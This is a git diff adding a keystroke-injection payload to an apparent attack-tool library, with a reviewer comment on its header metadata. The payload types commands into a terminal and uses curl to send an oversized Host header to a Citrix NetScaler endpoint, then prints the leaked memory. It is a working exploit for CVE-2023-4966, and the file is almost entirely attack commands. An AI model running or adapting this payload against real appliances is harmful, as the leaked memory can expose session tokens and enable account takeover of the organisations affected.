diff --git a/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt b/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt
new file mode 100644
index 00000000..f829d408
--- /dev/null
+++ b/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt
@@ -0,0 +1,48 @@
+* REM ##################################################################################
+* REM # #
+* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
+* REM # Author : Aleff #
+* REM # Version : 1.0 #
+* REM # Category : incident-response #
+* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
+* REM # #
+* REM ##################################################################################
+
+* REM GNU/Linux Version
+
+QUACK DELAY 3000
+QUACK CTRL-ALT t
+QUACK DELAY 1000
+
+QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING headers="-H 'Host:$header_value'"
+QUACK ENTER
+QUACK DELAY 500
+
+* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+QUACK ENTER
+QUACK DELAY 500
+
+QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING echo "--- Dumped memory ---"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING echo "$response" | cut -c 131051-
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING echo "--- End ---"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING else
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING echo "Could not dump memory"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING fi
+QUACK ENTER
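Review bot: The header metadata in this hunk contradicts itself and the file's location: the `Category : incident-response` line describes a payload that the title, the directory `payloads/library/execution/` and the body all present as an exploitation/execution payload, so anyone cataloguing or filtering the library by category will misfile it. The `Target` line also misspells the product as `NetScaler ADV` where the title, the directory name and the CVE all refer to NetScaler ADC. I would change those two header lines to `* REM # Category : execution #` and `* REM # Target : Citrix NetScaler ADC; NetScaler Gateway #` so the header agrees with the path and the title. The `#HOSTNAME` placeholder is only explained by the REM on the line above the curl call; the header block should also state that the placeholder must be replaced before the payload is run, since the script otherwise sends the request to a literal `#HOSTNAME`.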